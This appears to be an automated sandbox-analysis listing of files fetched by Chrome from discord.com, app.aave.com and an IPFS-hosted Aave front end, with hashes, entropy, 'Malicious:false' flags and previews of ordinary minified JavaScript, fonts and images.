                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78187"],{526988:function(t,n,r){var e=r(354848),o=r(938507),i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not a function")}},24033:function(t,n,r){var e=r(622281),o=String,i=TypeError;t.exports=function(t){if(e(t))return t;throw i(o(t)+" is not an object")}},953326:function(t,n,r){var e=r(299623),o=r(980855),i=r(49693),u=function(t){return function(n,r,u){var c,f=e(n),a=i(f),s=o(u,a);if(t&&r!=r){for(;a>s;)if((c=f[s++])!=c)return!0}else for(;a>s;s++)if((t||s in f)&&f[s]===r)return t||s||0;return!t&&-1}};t.exports={includes:u(!0),indexOf:u(!1)}},332916:function(t,n,r){var e=r(581031),o=e({}.toString),i=e("".slice);t.exports=function(t){return i(o(t),8,-1)}},381740:function(t,n,r){var e=r(740362),o=r(666061),i=r(347722),u=r(97131);t.exports=function(t,n,r){for(var c=o(n),f=u.f,a=i.f,s=0;s<c.length;s++){var p=c[s];!e(t,p)&&!(r&&e(r,p))&&f(t,p,a(n,p))}}},251069:function(t,n,r){var e=r
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):1864710
                                                                                                                                                                                                                                                  Entropy (8bit):5.55161545080784
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:49152:fpyxnfdD9MWgEWGYUIS69i0D2xzE8zSp13CUnsk9CaEwloUxg8UIc9w:NsGN
                                                                                                                                                                                                                                                  MD5:9FD79FFB450982E6F77F2D0E60DB21BF
                                                                                                                                                                                                                                                  SHA1:E3DE3454A879029A09DF5A42AB06ECADC8ABB384
                                                                                                                                                                                                                                                  SHA-256:AC92A1C7CBE14F23D5CAFCBC887979F89F1C7F3817078B35791F8A4E31DDF9F2
                                                                                                                                                                                                                                                  SHA-512:A90AAD7B7729B9F23A1B74054FCC9DC260F78D5E8EDD232DB77C1C95E2004E897770F4074D67B670E3C4CBCBB18E5AB690651C549DAC220E2FFE17D778FC3044
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/_app-c0d18763a38243f4.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2888],{20846:function(e,t,n){"use strict";n.d(t,{W:function(){return s}});var r=n(64146),a=n(8198);const i=[{inputs:[{internalType:"address",name:"stkAave",type:"address"},{internalType:"address",name:"ethUsdPriceFeed",type:"address"},{internalType:"address",name:"aaveUsdPriceFeed",type:"address"}],stateMutability:"nonpayable",type:"constructor"},{inputs:[],name:"AAVE_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"ETH_USD_PRICE_FEED",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[],name:"STAKED_AAVE",outputs:[{internalType:"address",name:"",type:"address"}],stateMutability:"view",type:"function"},{inputs:[{internalType:"address",name:"stakedAsset",type:"address"},{internalType:"address",name:"oracle",type:"address"}],name:"getStakedAssetData",outputs:[{components:[{internalType:"uint256",
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9876), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):9876
                                                                                                                                                                                                                                                  Entropy (8bit):5.284716799878069
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:h9bEDHZT0TA7l6D2Kt0RwzGwsV8oXiTRIvu664:WAQ
                                                                                                                                                                                                                                                  MD5:009EAE380D18E68D02FD3B1EFE0B3979
                                                                                                                                                                                                                                                  SHA1:F16F04E668DE6B1960B8E060A897AAAD24B7DC69
                                                                                                                                                                                                                                                  SHA-256:3B970DE2228A8DFAD7880CCA281E91DB8DB698E103B8925638915287AEF6032F
                                                                                                                                                                                                                                                  SHA-512:A8C53DBAEC8788C3AA137A75E43E5119708617574CE641FA88BC0B54AE745D3BD414BBF29D4203DA8623BDCEFCA2C8EAF8F83E17091F66F36B38D8B559EE0DE2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/3629-beffcb1d37e29d12.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3629],{43629:function(e,r,t){t.d(r,{hv:function(){return W},rM:function(){return J},wD:function(){return K},ov:function(){return H}});var n=t(59499),o=t(4730),i=t(1279),c=t(67294),s=t(49501),a=t(58771),p=t(30120),l=t(68861),u=t(58527),b=t(85893),d=["borrowCap"];function f(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function y(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?f(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):f(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}var j=function(e){var r=e.borrowCap,t=(0,o.Z)(e,d);return r&&r.isMaxed?(0,b.jsx)(p.Z,{s
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):1041
                                                                                                                                                                                                                                                  Entropy (8bit):4.791566518594403
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:24:tcGtupzDW+k7Oq5NSqTNhReWpRYfjBjkTkCPXUtkv:2GSG7OqPBaFp2ks
                                                                                                                                                                                                                                                  MD5:EAA405456DB4FB48D937AF1DB371B835
                                                                                                                                                                                                                                                  SHA1:D7F4DF1702BF830C60ABA056BDFE947D941D5430
                                                                                                                                                                                                                                                  SHA-256:6FA4DDBD9B1E81DAEF550A249A098431CAAE4CC5B9AAEAADAD86A547D32EEDB4
                                                                                                                                                                                                                                                  SHA-512:E5F590A73EE767AEB9EA03BD7120A84CFCE8563D41934761B6CE8C2DACC3D67B85C1443475F7F03AC616F17489AE6B8FE25D8A90C70BEC184B8583C2D6D56AE4
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:<svg viewBox="0 0 20 14" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M-3.628-.076v14.154h26.96V-.076h-26.96Z" fill="#012169"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.73 15.344 9.852 8.583l-12.878 6.761-1.205-2.534L6.837 7-4.23 1.19l1.205-2.534L9.852 5.417 22.73-1.344l1.205 2.534L12.867 7l11.068 5.81-1.205 2.534Z" fill="#fff"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.93 14.921 9.852 8.054-3.226 14.92l-.805-1.689L7.843 7-4.03.767l.805-1.689L9.852 5.946 22.93-.922l.805 1.69L11.86 7l11.874 6.232-.805 1.69Z" fill="#C8102E"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M12.099 14.077H7.605V9.36H-3.628V4.64H7.605V-.076h4.494V4.64h11.233v4.72H12.1v4.717Z" fill="#fff"/><path d="M9.852-.076v14.154V-.076ZM-3.628 7h26.96-26.96Z" fill="#000"/><path d="M11.2 14.077H8.504V8.416H-3.628V5.585H8.504V-.076H11.2v5.66h12.132v
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17745)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):17794
                                                                                                                                                                                                                                                  Entropy (8bit):5.474218395624201
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:knp0/xKyAhCraL7NdDN3AQJhGleqX1VXn0Fmc1YXsEPoVUAE:knpGyfLvJJgeUjD
                                                                                                                                                                                                                                                  MD5:838CFF62E72197F48B6F5B8B980842FF
                                                                                                                                                                                                                                                  SHA1:981E4F01023957A128AF323236C695C8998749F1
                                                                                                                                                                                                                                                  SHA-256:0E59DA05A21FDB5F235F2D1454A96A5427C595C90D926123943B6C7F7DA3B8D8
                                                                                                                                                                                                                                                  SHA-512:5FAD84995F93D6C3FB1B90401AE01A34B9E7CE15602706FFB3A40484654B8319B60870F6D993FC3D88DE3862ACDC1DAD7824B07B924D50E97955CEDB7BEF9B5A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/bfcdec9c24c821355547.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11260"],{26230:function(e){e.exports="/assets/afd44ae05126b5fab40d.svg"},935227:function(e){e.exports="/assets/50b96601171fd361101c.svg"},479495:function(e,t,s){s(757143);var n,r=s(735250),i=s(470079),a=s(120356),o=s.n(a),l=s(593473),c=s(873546),u=s(442837),d=s(570140),h=s(893776),p=s(129293),m=s(388905),f=s(17894),C=s(124860),g=s(108427),x=s(314897),N=s(585483),v=s(981631),E=s(689938),S=s(113207);function A(e,t,s){return t in e?Object.defineProperty(e,t,{value:s,enumerable:!0,configurable:!0,writable:!0}):e[t]=s,e}u.ZP.initialize();class j extends(n=i.PureComponent){componentDidMount(){(0,g.e)("reset_password")}renderPasswordReset(){let{password:e,error:t,hasCancel:n}=this.state,i=this.isSubmitting(),a=null!=t?t:this.renderError("password");return(0,r.jsxs)(m.ZP,{onSubmit:this.handleSubmit,tag:"form",children:[(0,r.jsx)("img",{alt:"",src:null==a?s(26230):s(935227),className:S.marginBottom20}),(0,r.jsx
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (27123), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):27123
                                                                                                                                                                                                                                                  Entropy (8bit):5.469697319357853
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:VwOhrkc7ke71uDW75r0r6chebEbE9Ef33zEY75lCwyQCfeBOXBx:V3L5ErQmfYK5I7feBOXBx
                                                                                                                                                                                                                                                  MD5:2BC0A0AEA6267FDE477D702B391BA533
                                                                                                                                                                                                                                                  SHA1:DCBB2751358C91D2E65DAC5B4CD2CB79156B1237
                                                                                                                                                                                                                                                  SHA-256:C2DD9C63F403CBECBD829B2280B00F74B80F3F9C85ED0567B8F19FD78963EDCE
                                                                                                                                                                                                                                                  SHA-512:9774443A1CE709B48E3D999FD0956FA7FFF34DE4066BDEEEC7A3CC3C9659635B14FD78D8F13DCB3CB8CF500BB608C1582F4E1F8727B9CD193C7DAD81AECF912C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/pages/markets-7557748c63adf50d.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1162],{4840:function(e,t,n){"use strict";n.r(t),n.d(t,{MarketContainer:function(){return ye},default:function(){return fe},marketContainerProps:function(){return je}});var r=n(59499),i=n(64288),s=n(30120),a=n(67294),o=n(70675),l=n(49501),c=n(80854),d=n(62097),x=n(61225),u=n(29630),p=n(54181),h=n(45556),m=n(13850),j=n(68861),y=n(69331),f=n(28480),b=n(14795),g=n(73965),v=n(46930),w=n(14379),Z=n(45884),O=n(99435),D=n(1475),C=n(36864),P=n(75084),A=n(11163),k=n(14249),S=n(42115),T=n(44749),E=n(14463),I=n(19547),L=n(58527),N=n(85642),_=n(78371),V=n(57609),M=n(52906),U=n(35161),W=n(32383),B=n(41024),F=n(72667),z=n(85893),Y=function(e){var t,n=(0,C.Z)({},e),r=(0,A.useRouter)(),i=(0,v.f)().currentMarket,a=(0,_.Y)((function(e){return e.trackEvent})),o=null===(t=N.U[i])||void 0===t?void 0:t[n.symbol];return(0,z.jsxs)(W.H,{px:6,minHeight:76,onClick:function(){a(V.uZ.DETAILS_NAVIGATION,{type:"Row",assetName:n.name,asset:n.underlyingAsset,mark
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9656), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):9656
                                                                                                                                                                                                                                                  Entropy (8bit):5.443759738167968
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:I0yPm20ovrtTveOqr9bhyQlHFtyHD8EHlymg4kLQVx+bqfMWU/aMWYrWLmQUpKKn:HyPm2pvrtTvePVhBHFIHpw0kUTw2q/ay
                                                                                                                                                                                                                                                  MD5:B1AD15399D5079C8C117C4BC6FBD5F17
                                                                                                                                                                                                                                                  SHA1:576B8FC56B4E79AA8CC6801D31245D38C49AF051
                                                                                                                                                                                                                                                  SHA-256:DE29546C84A2418D2F819A5A381D70CBB817782FFAA404117ED4B5CE740C937B
                                                                                                                                                                                                                                                  SHA-512:4A2B27F3AA0F1D64C494C08C3399D56E8D15FB8439042BA40F217A0061906ADECE637D14EDCB91374815B138848FA06E01B759B60D18E6C6A0006B3AE015AEB2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3645],{62753:function(e,t,o){var n=o(64836);t.Z=void 0;var r=n(o(64938)),i=o(85893),a=(0,r.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},75158:function(e,t,o){o.d(t,{Z:function(){return C}});var n=o(63366),r=o(87462),i=o(67294),a=o(86010),s=o(94780),c=o(41796),l=o(37743),d=o(54235),u=o(85893),p=(0,d.Z)((0,u.jsx)("path",{d:"M19 5v14H5V5h14m0-2H5c-1.1 0-2 .9-2 2v14c0 1.1.9 2 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2z"}),"CheckBoxOutlineBlank"),m=(0,d.Z)((0,u.jsx)("path",{d:"M19 3H5c-1.11 0-2 .9-2 2v14c0 1.1.89 2 2 2h14c1.11 0 2-.9 2-2V5c0-1.1-.89-2-2-2zm-9 1
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):130002
                                                                                                                                                                                                                                                  Entropy (8bit):5.26274534357211
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:M3hOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX0n:M3hOC0x96ruNiXcvh0jyxRyXa
                                                                                                                                                                                                                                                  MD5:8CEAC1A0789024027E37CCA07BEBAAD2
                                                                                                                                                                                                                                                  SHA1:6A80812D9E27ECC9B58466D027409F8A0668E2F4
                                                                                                                                                                                                                                                  SHA-256:745834316128A9605DB352A4146DFB81CFD209FA037D3256277E2BC9D12B0F44
                                                                                                                                                                                                                                                  SHA-512:A99D9DCA1C31AF0C2FE4E8B178B79B13DFA9F2A49D4776F1A9C4D008A6ACD4CD1C8AFF1B8D04D37AF9331E15F786D6A43186C45D2CD6FB3C626F92E1E597138B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/framework-79bce4a3a540b080.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{64448:function(e,t,n){var r=n(67294),l=n(96086),a=n(63840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18413)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):18462
                                                                                                                                                                                                                                                  Entropy (8bit):5.315468160706795
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:tOQ0mtG04pG+rx1soKoLItuPVMWpUdq3FYbNbeka5xeWoY/La0WMTUbbbutFY/Gg:tOPmtGTGGDsoRstuKFNCQ/ORQ3
                                                                                                                                                                                                                                                  MD5:8512E88B19ECA216651CF98758081B2F
                                                                                                                                                                                                                                                  SHA1:7B2068A3745C79A04BC5EEFDC8502DBF1248DC43
                                                                                                                                                                                                                                                  SHA-256:777062C855794DC39AD7C1100C51D812470B6D4D8691F3AD3602733FB6C63AD0
                                                                                                                                                                                                                                                  SHA-512:958CA401AF7A1192640E094BA5F3733AA5B2D6FC46EA6AE398779C4F858BEFD5F2F059C4BC4B5438D10CA66F33D9CAD139E78021A2328B7930AD3057DA546406
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/0f4597d59327b36932f5.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["20011"],{482682:function(t){t.exports="/assets/ebb5b41de823fbc19d12.png"},450125:function(t){t.exports="/assets/1e4932a7afbb1fcdba2d.png"},733949:function(t){t.exports="/assets/e1ce6b38901837435ec5.png"},877604:function(t,i,e){e(411104);var s,n=e(735250),h=e(470079),a=e(120356),r=e.n(a),l=e(111543);function o(t,i,e){return i in t?Object.defineProperty(t,i,{value:e,enumerable:!0,configurable:!0,writable:!0}):t[i]=e,t}let d=t=>new Promise((i,e)=>{null==t&&e(Error("No image src passed"));let s=new Image;s.src=t,s.onload=()=>i(s),s.onerror=t=>e(t)});class u extends(s=h.PureComponent){componentDidUpdate(t){t.src!==this.props.src&&this.setState({loaded:!1},()=>this.initialize())}initialize(){d(this.props.src).then(()=>{!this.unmounting&&this.setState({loaded:!0})})}componentWillUnmount(){this.unmounting=!0}render(){let{className:t,src:i,alt:e,width:s,height:h,onLoad:a,style:o,imageClassName:d}=this.props,{lo
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 106140, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):106140
                                                                                                                                                                                                                                                  Entropy (8bit):7.996661600980398
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:JNQdKgDRY2QEdOWASkVB09yzqr4hP7a/lR8A:IdKgDRHcDsbt/rh
                                                                                                                                                                                                                                                  MD5:444A7284663A3BC886683EB81450B294
                                                                                                                                                                                                                                                  SHA1:1E94A0DFAC8BAB0947EA9B0B6FB663EBAD5CCEB5
                                                                                                                                                                                                                                                  SHA-256:C63158BABCB7902203ED73476CCF901DB34825EA524D4A36A52B5E5F97E1ABF7
                                                                                                                                                                                                                                                  SHA-512:7BE12803AAB99AC90DCB4D56EBDB682612F8ECFACA95A2B60A9B5B06F461ED2222CCF757280E40CF1D4860E67BC35D5391AE5479D6B7282EA075F7EE56BF53D1
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/media/Inter-Bold.579e0f95.woff2
                                                                                                                                                                                                                                                  Preview:wOF2............... ...>..............................(...J.`.......,..Q..T..6.$..N. ..Z...-[.3.....y/.%....x.iYkf?.}t....Z......d.....M}A........%oV.n(n.N...m.d...>..............okYD:....^.R.W.H..D..c.l.J..c.N J3.h..B.#.c6A.0QY.J*DI^p.bKa*(.4..5..Mk....<Sh...mKXD..rA.........$..Zw.4..1..Me.....d0.%.+.....(....j..B/aV(``..}...1..d...a.4.$...1J.."D..j(h!JX...@+U.QUg.....L...n.V..!..M.H.<..q2..n.....$.G.pp.\..PYO...""......E}}....Y.[...5kOq.....^.q.5...mN.;..1......:xx+...=.\.s<.Ql....sl.{N$..[...s........z0.O..>.Ur~.G.>:..i^.{.)tQ......G....y.a....*9.bB{mE?C....9...54......6..f...+....j].jt..i_&.i.*....].hzv...gp....;.9...!2n..e...W.dZ|.C...3.).?^../..)..D...........=q...dYp...6t..X@.@*.C.......[/!.. B.....x.aB"......-.......%Y...VU..`Y.q..2..:.r..G1.H`...../Y.eR.`....k....+h.C;..%'6BA.....m..5fT1wL...c^.=.b.S?.........s1.G.^4.s.MH.n..6;..d.a...:7...[9.>X....;w.....m.LS.6..H..7..........&..<^..$.........=........}.mI.8....GQ.....G*x.E..*w.(*...._
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):68
                                                                                                                                                                                                                                                  Entropy (8bit):4.537696988526014
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:YNEyLLB6UQEDdFMJwnDEY9:YF16JqLMJwf9
                                                                                                                                                                                                                                                  MD5:D9589AF2B36EA54FCCC5CD7C88C292B5
                                                                                                                                                                                                                                                  SHA1:CD387EA798EF4489765E2E34025ACA3488545D94
                                                                                                                                                                                                                                                  SHA-256:922A5EE036EFADF0819602EAA0AA5DADA3913441B5447CAC777BE2E2D97F5E3F
                                                                                                                                                                                                                                                  SHA-512:13630998EC8E753B1F1EDD73D4C1CFE10D20138764F2CCC93B065B64B1AFAD207A682AD5AF8193F855B8D361FF4E2B2651D455D83BFBCF746C8454E9336ABF87
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/version.stable.json?_=5758322
                                                                                                                                                                                                                                                  Preview:{"hash":"fddab3e36b38117512b4d612365af827c49e9868","required":false}
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:PNG image data, 589 x 581, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):148367
                                                                                                                                                                                                                                                  Entropy (8bit):7.987423434371717
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3072:QxhGhPIHWXfU5Y/zQkimnNfR3MklgbEVkZkd4nvK31tX/3NkLT3r:QxEhg26M1PlMIgbEVkZC4noLXur
                                                                                                                                                                                                                                                  MD5:E918BA5EE43397B18769583750344766
                                                                                                                                                                                                                                                  SHA1:F7E873E46FBB4F3C2C375B5476CC9B4461083B09
                                                                                                                                                                                                                                                  SHA-256:737BC466F3EF21A044B5455D1F387EAC46EDBABBF038B8A5A11C1FF4ACEE6D95
                                                                                                                                                                                                                                                  SHA-512:E0E25AF2032EE80A27832D856C1FB9855103918008C83724E81AA2955DE1B31DF35DBDD2768032CA00A4F6C6D5D06C1946F6675025C30ABC73DBB58BDABFA4EE
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...M...E........5....pHYs...%...%.IR$.....sRGB.........gAMA......a...C$IDATx....-.U.|...._...6....(.B......`~@...@`l.0.;... ...$.d@`V6 ....$0.(K......f...?.r..;3/I.....Cuuuw.W.9u...`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0.....`0..'.......S...`0....0.O\.M..7...E.u.=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11489), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):11489
                                                                                                                                                                                                                                                  Entropy (8bit):5.357635242214589
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:zfvhkY1uywiNqMZA0lCwPW+2YE8V6jBb/KLnRnJh9:luANSgVABb/KLnRnJh9
                                                                                                                                                                                                                                                  MD5:2A1E2B7606A6A7EB12CE1FF4CB99C1F2
                                                                                                                                                                                                                                                  SHA1:D36151814366F1F6C31FF2BFCD2A2AB34CF69641
                                                                                                                                                                                                                                                  SHA-256:F05022051B22E29DB2C0294EAB0B143C5BAA75DBD9A2A2D7498C24B65056C991
                                                                                                                                                                                                                                                  SHA-512:9B631C70FA74054CF8812DF710D50DBC42E67E55DB0FED42ACDA66636C1FC285F4BE7A52698979C254FDAEAFA7BA39D542DDE0A042F65DED81D04EC9B7DE1972
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/6211.0162dd216a599ca3.js
